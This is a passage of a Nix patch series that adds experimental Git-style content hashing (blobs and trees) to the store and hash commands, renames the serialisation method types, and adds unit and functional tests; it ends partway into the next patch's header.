         return TextIngestionMethod {};
     }
@@ -131,6 +138,10 @@ static std::pair parseContentAddressMethodP
         auto method = FileIngestionMethod::Flat;
         if (splitPrefix(rest, "r:"))
             method = FileIngestionMethod::Recursive;
+        else if (splitPrefix(rest, "git:")) {
+            experimentalFeatureSettings.require(Xp::GitHashing);
+            method = FileIngestionMethod::Git;
+        }
         HashAlgorithm hashAlgo = parseHashAlgorithm_();
         return {
             std::move(method),
diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc
index cf5020dfe..873065e14 100644
--- a/src/libstore/daemon.cc
+++ b/src/libstore/daemon.cc
@@ -13,6 +13,7 @@
 #include "archive.hh"
 #include "derivations.hh"
 #include "args.hh"
+#include "git.hh"
 
 namespace nix::daemon {
 
@@ -443,13 +444,17 @@ static void performOp(TunnelLogger * logger, ref store,
                     TeeSource savedNARSource(from, saved);
                     NullFileSystemObjectSink sink; /* just parse the NAR */
                     parseDump(sink, savedNARSource);
-                } else {
+                } else if (method == FileIngestionMethod::Flat) {
                     /* Incrementally parse the NAR file, stripping the
                        metadata, and streaming the sole file we expect into
                        `saved`. */
                     RegularFileSink savedRegular { saved };
                     parseDump(savedRegular, from);
                     if (!savedRegular.regular) throw Error("regular file expected");
+                } else {
+                    /* Should have validated above that no other file ingestion
+                       method was used. */
+                    assert(false);
                 }
             });
             logger->startWork();
diff --git a/src/libstore/local-fs-store.hh b/src/libstore/local-fs-store.hh
index bf855b67e..8fb081200 100644
--- a/src/libstore/local-fs-store.hh
+++ b/src/libstore/local-fs-store.hh
@@ -43,7 +43,7 @@ public:
     LocalFSStore(const Params & params);
 
     void narFromPath(const StorePath & path, Sink & sink) override;
-    ref getFSAccessor(bool requireValidPath) override;
+    ref getFSAccessor(bool requireValidPath = true) override;
 
     /**
      * Creates symlink from the `gcRoot` to the `storePath` and
diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc
index 2c22bfe31..5f35cf3a8 100644
--- a/src/libstore/local-store.cc
+++ b/src/libstore/local-store.cc
@@ -1,5 +1,6 @@
 #include "local-store.hh"
 #include "globals.hh"
+#include "git.hh"
 #include "archive.hh"
 #include "pathlocks.hh"
 #include "worker-protocol.hh"
@@ -1097,19 +1098,29 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source,
             if (info.ca) {
                 auto & specified = *info.ca;
                 auto actualHash = ({
-                    HashModuloSink caSink {
-                        specified.hash.algo,
-                        std::string { info.path.hashPart() },
-                    };
-                    PosixSourceAccessor accessor;
-                    dumpPath(
-                        *getFSAccessor(false),
-                        CanonPath { printStorePath(info.path) },
-                        caSink,
-                        specified.method.getFileIngestionMethod());
+                    auto accessor = getFSAccessor(false);
+                    CanonPath path { printStorePath(info.path) };
+                    Hash h { HashAlgorithm::SHA256 }; // throwaway def to appease C++
+                    auto fim = specified.method.getFileIngestionMethod();
+                    switch (fim) {
+                    case FileIngestionMethod::Flat:
+                    case FileIngestionMethod::Recursive:
+                    {
+                        HashModuloSink caSink {
+                            specified.hash.algo,
+                            std::string { info.path.hashPart() },
+                        };
+                        dumpPath(*accessor, path, caSink, (FileSerialisationMethod) fim);
+                        h = caSink.finish().first;
+                        break;
+                    }
+                    case FileIngestionMethod::Git:
+                        h = git::dumpHash(specified.hash.algo, *accessor, path).hash;
+                        break;
+                    }
                     ContentAddress {
                         .method = specified.method,
-                        .hash = caSink.finish().first,
+                        .hash = std::move(h),
                     };
                 });
                 if (specified.hash != actualHash.hash) {
@@ -1199,7 +1210,30 @@ StorePath LocalStore::addToStoreFromDump(
         delTempDir = std::make_unique(tempDir);
         tempPath = tempDir + "/x";
 
-        restorePath(tempPath, bothSource, method.getFileIngestionMethod());
+        auto fim = method.getFileIngestionMethod();
+        switch (fim) {
+        case FileIngestionMethod::Flat:
+        case FileIngestionMethod::Recursive:
+            restorePath(tempPath, bothSource, (FileSerialisationMethod) fim);
+            break;
+        case FileIngestionMethod::Git: {
+            RestoreSink sink;
+            sink.dstPath = tempPath;
+            auto accessor = getFSAccessor();
+            git::restore(sink, bothSource, [&](Hash childHash) {
+                return std::pair {
+                    &*accessor,
+                    CanonPath {
+                        printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
+                            .method = FileIngestionMethod::Git,
+                            .hash = childHash,
+                        }))
+                    },
+                };
+            });
+            break;
+        }
+        }
 
         dumpBuffer.reset();
         dump = {};
@@ -1238,7 +1272,30 @@ StorePath LocalStore::addToStoreFromDump(
             if (inMemory) {
                 StringSource dumpSource { dump };
                 /* Restore from the buffer in memory. */
-                restorePath(realPath, dumpSource, method.getFileIngestionMethod());
+                auto fim = method.getFileIngestionMethod();
+                switch (fim) {
+                case FileIngestionMethod::Flat:
+                case FileIngestionMethod::Recursive:
+                    restorePath(realPath, dumpSource, (FileSerialisationMethod) fim);
+                    break;
+                case FileIngestionMethod::Git: {
+                    RestoreSink sink;
+                    sink.dstPath = realPath;
+                    auto accessor = getFSAccessor();
+                    git::restore(sink, dumpSource, [&](Hash childHash) {
+                        return std::pair {
+                            &*accessor,
+                            CanonPath {
+                                printStorePath(this->makeFixedOutputPath("git", FixedOutputInfo {
+                                    .method = FileIngestionMethod::Git,
+                                    .hash = childHash,
+                                }))
+                            },
+                        };
+                    });
+                    break;
+                }
+                }
             } else {
                 /* Move the temporary path we restored above. */
                 moveFile(tempPath, realPath);
@@ -1367,7 +1424,7 @@ bool LocalStore::verifyStore(bool checkContents, RepairFlag repair)
             PosixSourceAccessor accessor;
             std::string hash = hashPath(
                 accessor, CanonPath { linkPath },
-                FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first.to_string(HashFormat::Nix32, false);
+                FileIngestionMethod::Recursive, HashAlgorithm::SHA256).to_string(HashFormat::Nix32, false);
             if (hash != link.name) {
                 printError("link '%s' was modified! expected hash '%s', got '%s'",
                     linkPath, link.name, hash);
diff --git a/src/libstore/optimise-store.cc b/src/libstore/optimise-store.cc
index 78e4f6d86..daaaaf073 100644
--- a/src/libstore/optimise-store.cc
+++ b/src/libstore/optimise-store.cc
@@ -151,7 +151,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats,
         PosixSourceAccessor accessor;
         hashPath(
             accessor, CanonPath { path },
-            FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first;
+            FileSerialisationMethod::Recursive, HashAlgorithm::SHA256).first;
     });
     debug("'%1%' has hash '%2%'", path, hash.to_string(HashFormat::Nix32, true));
 
@@ -166,7 +166,7 @@ void LocalStore::optimisePath_(Activity * act, OptimiseStats & stats,
                 PosixSourceAccessor accessor;
                 hashPath(
                     accessor, CanonPath { linkPath },
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256).first;
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256).first;
            })))
         {
             // XXX: Consider overwriting linkPath with our valid version.
diff --git a/src/libstore/remote-store.cc b/src/libstore/remote-store.cc
index fadef45ff..0cae84828 100644
--- a/src/libstore/remote-store.cc
+++ b/src/libstore/remote-store.cc
@@ -13,6 +13,7 @@
 #include "derivations.hh"
 #include "pool.hh"
 #include "finally.hh"
+#include "git.hh"
 #include "logging.hh"
 #include "callback.hh"
 #include "filetransfer.hh"
diff --git a/src/libstore/remote-store.hh b/src/libstore/remote-store.hh
index 87704985b..c51a21375 100644
--- a/src/libstore/remote-store.hh
+++ b/src/libstore/remote-store.hh
@@ -184,7 +184,7 @@ protected:
 
     friend struct ConnectionHandle;
 
-    virtual ref getFSAccessor(bool requireValidPath) override;
+    virtual ref getFSAccessor(bool requireValidPath = true) override;
 
     virtual void narFromPath(const StorePath & path, Sink & sink) override;
 
diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc
index 4238cbbf5..c44612ec5 100644
--- a/src/libstore/store-api.cc
+++ b/src/libstore/store-api.cc
@@ -12,7 +12,9 @@
 #include "references.hh"
 #include "archive.hh"
 #include "callback.hh"
+#include "git.hh"
 #include "remote-store.hh"
+#include "posix-source-accessor.hh"
 // FIXME this should not be here, see TODO below on
 // `addMultipleToStore`.
 #include "worker-protocol.hh"
@@ -119,6 +121,9 @@ static std::string makeType(
 
 StorePath StoreDirConfig::makeFixedOutputPath(std::string_view name, const FixedOutputInfo & info) const
 {
+    if (info.method == FileIngestionMethod::Git && info.hash.algo != HashAlgorithm::SHA1)
+        throw Error("Git file ingestion must use SHA-1 hash");
+
     if (info.hash.algo == HashAlgorithm::SHA256 && info.method == FileIngestionMethod::Recursive) {
         return makeStorePath(makeType(*this, "source", info.references), info.hash, name);
     } else {
@@ -166,7 +171,7 @@ std::pair StoreDirConfig::computeStorePath(
     const StorePathSet & references,
     PathFilter & filter) const
 {
-    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter).first;
+    auto h = hashPath(accessor, path, method.getFileIngestionMethod(), hashAlgo, filter);
     return {
         makeFixedOutputPathFromCA(
             name,
@@ -193,7 +198,37 @@ StorePath Store::addToStore(
     RepairFlag repair)
 {
     auto source = sinkToSource([&](Sink & sink) {
-        dumpPath(accessor, path, sink, method.getFileIngestionMethod(), filter);
+        auto fim = method.getFileIngestionMethod();
+        switch (fim) {
+        case FileIngestionMethod::Flat:
+        case FileIngestionMethod::Recursive:
+        {
+            dumpPath(accessor, path, sink, (FileSerialisationMethod) fim, filter);
+            break;
+        }
+        case FileIngestionMethod::Git:
+        {
+            git::dump(
+                accessor, path,
+                sink,
+                // recursively add to store if path is a directory
+                [&](const CanonPath & path) -> git::TreeEntry {
+                    auto storePath = addToStore("git", accessor, path, method, hashAlgo, references, filter, repair);
+                    auto info = queryPathInfo(storePath);
+                    assert(info->ca);
+                    assert(info->ca->method == FileIngestionMethod::Git);
+                    auto stat = getFSAccessor()->lstat(CanonPath(printStorePath(storePath)));
+                    auto gitModeOpt = git::convertMode(stat.type);
+                    assert(gitModeOpt);
+                    return {
+                        .mode = *gitModeOpt,
+                        .hash = info->ca->hash,
+                    };
+                },
+                filter);
+            break;
+        }
+        }
     });
     return addToStoreFromDump(*source, name, method, hashAlgo, references, repair);
 }
@@ -355,9 +390,7 @@ ValidPathInfo Store::addToStoreSlow(
     NullFileSystemObjectSink blank;
     auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat
         ? (FileSystemObjectSink &) fileSink
-        : method.getFileIngestionMethod() == FileIngestionMethod::Recursive
-        ? (FileSystemObjectSink &) blank
-        : (abort(), (FileSystemObjectSink &)*(FileSystemObjectSink *)nullptr); // handled both cases
+        : (FileSystemObjectSink &) blank; // for recursive or git we do recursive
 
     /* The information that flows from tapped (besides being replicated in
        narSink), is now put in parseSink. */
@@ -369,6 +402,8 @@ ValidPathInfo Store::addToStoreSlow(
 
     auto hash = method == FileIngestionMethod::Recursive && hashAlgo == HashAlgorithm::SHA256
         ? narHash
+        : method == FileIngestionMethod::Git
+        ? git::dumpHash(hashAlgo, accessor, srcPath).hash
         : caHashSink.finish().first;
 
     if (expectedCAHash && expectedCAHash != hash)
diff --git a/src/libstore/uds-remote-store.hh b/src/libstore/uds-remote-store.hh
index a5ac9080a..8bce8994a 100644
--- a/src/libstore/uds-remote-store.hh
+++ b/src/libstore/uds-remote-store.hh
@@ -35,7 +35,7 @@ public:
     static std::set uriSchemes()
     { return {"unix"}; }
 
-    ref getFSAccessor(bool requireValidPath) override
+    ref getFSAccessor(bool requireValidPath = true) override
     { return LocalFSStore::getFSAccessor(requireValidPath); }
 
     void narFromPath(const StorePath & path, Sink & sink) override
diff --git a/src/libutil/file-content-address.cc b/src/libutil/file-content-address.cc
index 2339024a2..471bda6a0 100644
--- a/src/libutil/file-content-address.cc
+++ b/src/libutil/file-content-address.cc
@@ -1,16 +1,53 @@
 #include "file-content-address.hh"
 #include "archive.hh"
+#include "git.hh"
 
 namespace nix {
 
-FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+static std::optional parseFileSerialisationMethodOpt(std::string_view input)
 {
     if (input == "flat") {
-        return FileIngestionMethod::Flat;
+        return FileSerialisationMethod::Flat;
     } else if (input == "nar") {
-        return FileIngestionMethod::Recursive;
+        return FileSerialisationMethod::Recursive;
     } else {
-        throw UsageError("Unknown file ingestion method '%s', expect `flat` or `nar`");
+        return std::nullopt;
+    }
+}
+
+FileSerialisationMethod parseFileSerialisationMethod(std::string_view input)
+{
+    auto ret = parseFileSerialisationMethodOpt(input);
+    if (ret)
+        return *ret;
+    else
+        throw UsageError("Unknown file serialisation method '%s', expect `flat` or `nar`", input);
+}
+
+
+FileIngestionMethod parseFileIngestionMethod(std::string_view input)
+{
+    if (input == "git") {
+        return FileIngestionMethod::Git;
+    } else {
+        auto ret = parseFileSerialisationMethodOpt(input);
+        if (ret)
+            return static_cast(*ret);
+        else
+            throw UsageError("Unknown file ingestion method '%s', expect `flat`, `nar`, or `git`", input);
+    }
+}
+
+
+std::string_view renderFileSerialisationMethod(FileSerialisationMethod method)
+{
+    switch (method) {
+    case FileSerialisationMethod::Flat:
+        return "flat";
+    case FileSerialisationMethod::Recursive:
+        return "nar";
+    default:
+        assert(false);
     }
 }
 
@@ -19,9 +56,11 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
 {
     switch (method) {
     case FileIngestionMethod::Flat:
-        return "flat";
     case FileIngestionMethod::Recursive:
-        return "nar";
+        return renderFileSerialisationMethod(
+            static_cast(method));
+    case FileIngestionMethod::Git:
+        return "git";
     default:
         abort();
     }
@@ -31,14 +70,14 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method)
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
-    FileIngestionMethod method,
+    FileSerialisationMethod method,
     PathFilter & filter)
 {
     switch (method) {
-    case FileIngestionMethod::Flat:
+    case FileSerialisationMethod::Flat:
         accessor.readFile(path, sink);
         break;
-    case FileIngestionMethod::Recursive:
+    case FileSerialisationMethod::Recursive:
         accessor.dumpPath(path, sink, filter);
         break;
     }
@@ -48,13 +87,13 @@ void dumpPath(
 void restorePath(
     const Path & path,
     Source & source,
-    FileIngestionMethod method)
+    FileSerialisationMethod method)
 {
     switch (method) {
-    case FileIngestionMethod::Flat:
+    case FileSerialisationMethod::Flat:
         writeFile(path, source);
         break;
-    case FileIngestionMethod::Recursive:
+    case FileSerialisationMethod::Recursive:
         restorePath(path, source);
         break;
     }
@@ -63,7 +102,7 @@ void restorePath(
 
 HashResult hashPath(
     SourceAccessor & accessor, const CanonPath & path,
-    FileIngestionMethod method, HashAlgorithm ha,
+    FileSerialisationMethod method, HashAlgorithm ha,
     PathFilter & filter)
 {
     HashSink sink { ha };
@@ -71,4 +110,20 @@ HashResult hashPath(
     return sink.finish();
 }
 
+
+Hash hashPath(
+    SourceAccessor & accessor, const CanonPath & path,
+    FileIngestionMethod method, HashAlgorithm ht,
+    PathFilter & filter)
+{
+    switch (method) {
+    case FileIngestionMethod::Flat:
+    case FileIngestionMethod::Recursive:
+        return hashPath(accessor, path, (FileSerialisationMethod) method, ht, filter).first;
+    case FileIngestionMethod::Git:
+        return git::dumpHash(ht, accessor, path, filter).hash;
+    }
+
+}
+
 }
diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh
index 9a7dae8c6..b361ab243 100644
--- a/src/libutil/file-content-address.hh
+++ b/src/libutil/file-content-address.hh
@@ -8,37 +8,38 @@
 namespace nix {
 
 /**
- * An enumeration of the main ways we can serialize file system
+ * An enumeration of the ways we can serialize file system
  * objects.
  */
-enum struct FileIngestionMethod : uint8_t {
+enum struct FileSerialisationMethod : uint8_t {
     /**
-     * Flat-file hashing. Directly ingest the contents of a single file
+     * Flat-file. The contents of a single file exactly.
      */
-    Flat = 0,
+    Flat,
+
     /**
-     * Recursive (or NAR) hashing. Serializes the file-system object in
-     * Nix Archive format and ingest that.
+     * Nix Archive. Serializes the file-system object in
+     * Nix Archive format.
      */
-    Recursive = 1,
+    Recursive,
 };
 
 /**
- * Parse a `FileIngestionMethod` by name. Choice of:
+ * Parse a `FileSerialisationMethod` by name. Choice of:
  *
- *  - `flat`: `FileIngestionMethod::Flat`
- *  - `nar`: `FileIngestionMethod::Recursive`
+ *  - `flat`: `FileSerialisationMethod::Flat`
+ *  - `nar`: `FileSerialisationMethod::Recursive`
  *
- * Oppostite of `renderFileIngestionMethod`.
+ * Opposite of `renderFileSerialisationMethod`.
  */
-FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+FileSerialisationMethod parseFileSerialisationMethod(std::string_view input);
 
 /**
- * Render a `FileIngestionMethod` by name.
+ * Render a `FileSerialisationMethod` by name.
  *
- * Oppostite of `parseFileIngestionMethod`.
+ * Opposite of `parseFileSerialisationMethod`.
  */
-std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+std::string_view renderFileSerialisationMethod(FileSerialisationMethod method);
 
 /**
  * Dump a serialization of the given file system object.
@@ -46,26 +47,97 @@ std::string_view renderFileIngestionMethod(FileIngestionMethod method);
 void dumpPath(
     SourceAccessor & accessor, const CanonPath & path,
     Sink & sink,
-    FileIngestionMethod method,
+    FileSerialisationMethod method,
     PathFilter & filter = defaultPathFilter);
 
 /**
- * Restore a serialization of the given file system object.
+ * Restore a serialisation of the given file system object.
  *
  * @TODO use an arbitrary `FileSystemObjectSink`.
  */
 void restorePath(
     const Path & path,
     Source & source,
-    FileIngestionMethod method);
+    FileSerialisationMethod method);
+
 
 /**
  * Compute the hash of the given file system object according to the
  * given method.
  *
- * The hash is defined as (essentially) hashString(ha, dumpPath(path)).
+ * the hash is defined as (in pseudocode):
+ *
+ * ```
+ * hashString(ha, dumpPath(...))
+ * ```
  */
 HashResult hashPath(
+    SourceAccessor & accessor, const CanonPath & path,
+    FileSerialisationMethod method, HashAlgorithm ha,
+    PathFilter & filter = defaultPathFilter);
+
+/**
+ * An enumeration of the ways we can ingest file system
+ * objects, producing a hash or digest.
+ */
+enum struct FileIngestionMethod : uint8_t {
+    /**
+     * Hash `FileSerialisationMethod::Flat` serialisation.
+     */
+    Flat,
+
+    /**
+     * Hash `FileSerialisationMethod::Recursive` serialisation.
+     */
+    Recursive,
+
+    /**
+     * Git hashing. In particular files are hashed as git "blobs", and
+     * directories are hashed as git "trees".
+     *
+     * Unlike `Flat` and `Recursive`, this is not a hash of a single
+     * serialisation but a [Merkle
+     * DAG](https://en.wikipedia.org/wiki/Merkle_tree) of multiple
+     * rounds of serialisation and hashing.
+     *
+     * @note Git's data model is slightly different, in that a plain
+     * file doesn't have an executable bit, directory entries do
+     * instead. We decided to treat a bare file as non-executable by fiat,
+     * as we do with `FileIngestionMethod::Flat` which also lacks this
+     * information. Thus, Git can encode some but not all of Nix's "File
+     * System Objects", and this sort of hashing is likewise partial.
+     */
+    Git,
+};
+
+/**
+ * Parse a `FileIngestionMethod` by name. Choice of:
+ *
+ *  - `flat`: `FileIngestionMethod::Flat`
+ *  - `nar`: `FileIngestionMethod::Recursive`
+ *  - `git`: `FileIngestionMethod::Git`
+ *
+ * Opposite of `renderFileIngestionMethod`.
+ */
+FileIngestionMethod parseFileIngestionMethod(std::string_view input);
+
+/**
+ * Render a `FileIngestionMethod` by name.
+ *
+ * Opposite of `parseFileIngestionMethod`.
+ */
+std::string_view renderFileIngestionMethod(FileIngestionMethod method);
+
+/**
+ * Compute the hash of the given file system object according to the
+ * given method.
+ *
+ * Unlike the other `hashPath`, this works on an arbitrary
+ * `FileIngestionMethod` instead of `FileSerialisationMethod`, but
+ * doesn't return the size, as size is not a simply and usefully
+ * defined notion for a Merkle format.
+ */
+Hash hashPath(
     SourceAccessor & accessor, const CanonPath & path,
     FileIngestionMethod method, HashAlgorithm ha,
     PathFilter & filter = defaultPathFilter);
diff --git a/src/nix-store/nix-store.cc b/src/nix-store/nix-store.cc
index 99dbfe6e3..7c8905da6 100644
--- a/src/nix-store/nix-store.cc
+++ b/src/nix-store/nix-store.cc
@@ -555,7 +555,7 @@ static void registerValidity(bool reregister, bool hashGiven, bool canonicalise)
                 HashResult hash = hashPath(
                     *store->getFSAccessor(false), CanonPath { store->printStorePath(info->path) },
 
-                    FileIngestionMethod::Recursive, HashAlgorithm::SHA256);
+                    FileSerialisationMethod::Recursive, HashAlgorithm::SHA256);
                 info->narHash = hash.first;
                 info->narSize = hash.second;
             }
diff --git a/src/nix/add-to-store.cc b/src/nix/add-to-store.cc
index ca2daecab..02154715f 100644
--- a/src/nix/add-to-store.cc
+++ b/src/nix/add-to-store.cc
@@ -2,6 +2,7 @@
 #include "common-args.hh"
 #include "store-api.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "posix-source-accessor.hh"
 #include "misc-store-flags.hh"
 
diff --git a/src/nix/hash.cc b/src/nix/hash.cc
index 98d227f0e..f849bf0cf 100644
--- a/src/nix/hash.cc
+++ b/src/nix/hash.cc
@@ -5,6 +5,7 @@
 #include "shared.hh"
 #include "references.hh"
 #include "archive.hh"
+#include "git.hh"
 #include "posix-source-accessor.hh"
 #include "misc-store-flags.hh"
 
@@ -66,9 +67,11 @@ struct CmdHashBase : Command
     {
         switch (mode) {
         case FileIngestionMethod::Flat:
-            return  "print cryptographic hash of a regular file";
+            return "print cryptographic hash of a regular file";
         case FileIngestionMethod::Recursive:
             return "print cryptographic hash of the NAR serialisation of a path";
+        case FileIngestionMethod::Git:
+            return "print cryptographic hash of the Git serialisation of a path";
         default:
             assert(false);
         };
@@ -77,17 +80,41 @@ struct CmdHashBase : Command
     void run() override
     {
         for (auto path : paths) {
+            auto makeSink = [&]() -> std::unique_ptr {
+                if (modulus)
+                    return std::make_unique(hashAlgo, *modulus);
+                else
+                    return std::make_unique(hashAlgo);
+            };
 
-            std::unique_ptr hashSink;
-            if (modulus)
-                hashSink = std::make_unique(hashAlgo, *modulus);
-            else
-                hashSink = std::make_unique(hashAlgo);
+            auto [accessor_, canonPath] = PosixSourceAccessor::createAtRoot(path);
+            auto & accessor = accessor_;
+            Hash h { HashAlgorithm::SHA256 }; // throwaway def to appease C++
+            switch (mode) {
+            case FileIngestionMethod::Flat:
+            case FileIngestionMethod::Recursive:
+            {
+                auto hashSink = makeSink();
+                dumpPath(accessor, canonPath, *hashSink, (FileSerialisationMethod) mode);
+                h = hashSink->finish().first;
+                break;
+            }
+            case FileIngestionMethod::Git: {
+                std::function hook;
+                hook = [&](const CanonPath & path) -> git::TreeEntry {
+                    auto hashSink = makeSink();
+                    auto mode = dump(accessor, path, *hashSink, hook);
+                    auto hash = hashSink->finish().first;
+                    return {
+                        .mode = mode,
+                        .hash = hash,
+                    };
+                };
+                h = hook(canonPath).hash;
+                break;
+            }
+            }
 
-            auto [accessor, canonPath] = PosixSourceAccessor::createAtRoot(path);
-            dumpPath(accessor, canonPath, *hashSink, mode);
-
-            Hash h = hashSink->finish().first;
             if (truncate && h.hashSize > 20) h = compressHash(h, 20);
             logger->cout(h.to_string(hashFormat, hashFormat == HashFormat::SRI));
         }
diff --git a/tests/functional/git-hashing/common.sh b/tests/functional/git-hashing/common.sh
new file mode 100644
index 000000000..5de96e74f
--- /dev/null
+++ b/tests/functional/git-hashing/common.sh
@@ -0,0 +1,11 @@
+source ../common.sh
+
+clearStore
+clearCache
+
+# Need backend to support git-hashing too
+requireDaemonNewerThan "2.18.0pre20230908"
+
+enableFeatures "git-hashing"
+
+restartDaemon
diff --git a/tests/functional/git-hashing/local.mk b/tests/functional/git-hashing/local.mk
new file mode 100644
index 000000000..ebec01940
--- /dev/null
+++ b/tests/functional/git-hashing/local.mk
@@ -0,0 +1,7 @@
+git-hashing-tests := \
+  $(d)/simple.sh
+
+install-tests-groups += git-hashing
+
+clean-files += \
+  $(d)/config.nix
diff --git a/tests/functional/git-hashing/simple.sh b/tests/functional/git-hashing/simple.sh
new file mode 100644
index 000000000..74b0220f8
--- /dev/null
+++ b/tests/functional/git-hashing/simple.sh
@@ -0,0 +1,58 @@
+source common.sh
+
+repo="$TEST_ROOT/scratch"
+git init "$repo"
+
+git -C "$repo" config user.email "you@example.com"
+git -C "$repo" config user.name "Your Name"
+
+try () {
+    hash=$(nix hash path --mode git --format base16 --algo sha1 $TEST_ROOT/hash-path)
+    [[ "$hash" == "$1" ]]
+
+    git -C "$repo" rm -rf hash-path || true
+    cp -r "$TEST_ROOT/hash-path" "$TEST_ROOT/scratch/hash-path"
+    git -C "$repo" add hash-path
+    git -C "$repo" commit -m "x"
+    git -C "$repo" status
+    hash2=$(git -C "$TEST_ROOT/scratch" rev-parse HEAD:hash-path)
+    [[ "$hash2" = "$1" ]]
+}
+
+# blob
+rm -rf $TEST_ROOT/hash-path
+echo "Hello World" > $TEST_ROOT/hash-path
+try "557db03de997c86a4a028e1ebd3a1ceb225be238"
+
+# tree with children
+rm -rf $TEST_ROOT/hash-path
+mkdir $TEST_ROOT/hash-path
+echo "Hello World" > $TEST_ROOT/hash-path/hello
+echo "Run Hello World" > $TEST_ROOT/hash-path/executable
+chmod +x $TEST_ROOT/hash-path/executable
+try "e5c0a11a556801a5c9dcf330ca9d7e2c572697f4"
+
+rm -rf $TEST_ROOT/dummy1
+echo Hello World! > $TEST_ROOT/dummy1
+path1=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy1)
+hash1=$(nix-store -q --hash $path1)
+test "$hash1" = "sha256:1brffhvj2c0z6x8qismd43m0iy8dsgfmy10bgg9w11szway2wp9v"
+
+rm -rf $TEST_ROOT/dummy2
+mkdir -p $TEST_ROOT/dummy2
+echo Hello World! > $TEST_ROOT/dummy2/hello
+path2=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy2)
+hash2=$(nix-store -q --hash $path2)
+test "$hash2" = "sha256:1vhv7zxam7x277q0y0jcypm7hwhccbzss81vkdgf0ww5sm2am4y0"
+
+rm -rf $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3
+mkdir -p $TEST_ROOT/dummy3/dir
+touch $TEST_ROOT/dummy3/dir/file
+echo Hello World! > $TEST_ROOT/dummy3/dir/file
+touch $TEST_ROOT/dummy3/dir/executable
+chmod +x $TEST_ROOT/dummy3/dir/executable
+echo Run Hello World! > $TEST_ROOT/dummy3/dir/executable
+path3=$(nix store add --mode git --hash-algo sha1 $TEST_ROOT/dummy3)
+hash3=$(nix-store -q --hash $path3)
+test "$hash3" = "sha256:08y3nm3mvn9qvskqnf13lfgax5lh73krxz4fcjd5cp202ggpw9nv"
diff --git a/tests/unit/libstore/content-address.cc b/tests/unit/libstore/content-address.cc
index 98c1eace3..cc1c7fcc6 100644
--- a/tests/unit/libstore/content-address.cc
+++ b/tests/unit/libstore/content-address.cc
@@ -13,6 +13,7 @@ TEST(ContentAddressMethod, testRoundTripPrintParse_1) {
         ContentAddressMethod { TextIngestionMethod {} },
         ContentAddressMethod { FileIngestionMethod::Flat },
         ContentAddressMethod { FileIngestionMethod::Recursive },
+        ContentAddressMethod { FileIngestionMethod::Git },
     }) {
         EXPECT_EQ(ContentAddressMethod::parse(cam.render()), cam);
     }
@@ -23,6 +24,7 @@ TEST(ContentAddressMethod, testRoundTripPrintParse_2) {
         "text",
         "flat",
         "nar",
+        "git",
     }) {
         EXPECT_EQ(ContentAddressMethod::parse(camS).render(), camS);
     }
diff --git a/tests/unit/libutil/file-content-address.cc b/tests/unit/libutil/file-content-address.cc
index 2e819ce40..294e39806 100644
--- a/tests/unit/libutil/file-content-address.cc
+++ b/tests/unit/libutil/file-content-address.cc
@@ -4,6 +4,32 @@
 
 namespace nix {
 
+/* ----------------------------------------------------------------------------
+ * parseFileSerialisationMethod, renderFileSerialisationMethod
+ * --------------------------------------------------------------------------*/
+
+TEST(FileSerialisationMethod, testRoundTripPrintParse_1) {
+    for (const FileSerialisationMethod fim : {
+        FileSerialisationMethod::Flat,
+        FileSerialisationMethod::Recursive,
+    }) {
+        EXPECT_EQ(parseFileSerialisationMethod(renderFileSerialisationMethod(fim)), fim);
+    }
+}
+
+TEST(FileSerialisationMethod, testRoundTripPrintParse_2) {
+    for (const std::string_view fimS : {
+        "flat",
+        "nar",
+    }) {
+        EXPECT_EQ(renderFileSerialisationMethod(parseFileSerialisationMethod(fimS)), fimS);
+    }
+}
+
+TEST(FileSerialisationMethod, testParseFileSerialisationMethodOptException) {
+    EXPECT_THROW(parseFileSerialisationMethod("narwhal"), UsageError);
+}
+
 /* ----------------------------------------------------------------------------
  * parseFileIngestionMethod, renderFileIngestionMethod
  * --------------------------------------------------------------------------*/
@@ -12,6 +38,7 @@ TEST(FileIngestionMethod, testRoundTripPrintParse_1) {
     for (const FileIngestionMethod fim : {
         FileIngestionMethod::Flat,
         FileIngestionMethod::Recursive,
+        FileIngestionMethod::Git,
     }) {
         EXPECT_EQ(parseFileIngestionMethod(renderFileIngestionMethod(fim)), fim);
     }
@@ -21,6 +48,7 @@ TEST(FileIngestionMethod, testRoundTripPrintParse_2) {
     for (const std::string_view fimS : {
         "flat",
         "nar",
+        "git",
     }) {
         EXPECT_EQ(renderFileIngestionMethod(parseFileIngestionMethod(fimS)), fimS);
     }

From d4ad1fcf303f6f34ebb30a82ebe6f99c26bef8cb Mon Sep 17 00:00:00 2001
From: John Ericson 
Date: Thu, 18 Jan 2024 23:57:26 -0500
Subject: [PATCH 525/654] Avoid creating temporary store object for git over
 the wire

Instead, serialize as NAR and send that over, then rehash server side.
This is algorithmically simpler, but comes at the cost of a new
parameter to `Store::addToStoreFromDump`.

Co-authored-by: Eelco Dolstra 
---
 src/libexpr/primops.cc                      |  2 +-
 src/libstore/binary-cache-store.cc          | 27 +++++---
 src/libstore/binary-cache-store.hh          |  3 +-
 src/libstore/build/local-derivation-goal.cc |  5 +-
 src/libstore/daemon.cc                      | 59 ++++++++--------
 src/libstore/derivations.cc                 |  2 +-
 src/libstore/dummy-store.cc                 |  3 +-
 src/libstore/legacy-ssh-store.hh            |  3 +-
 src/libstore/local-store.cc                 | 77 ++++++++-------------
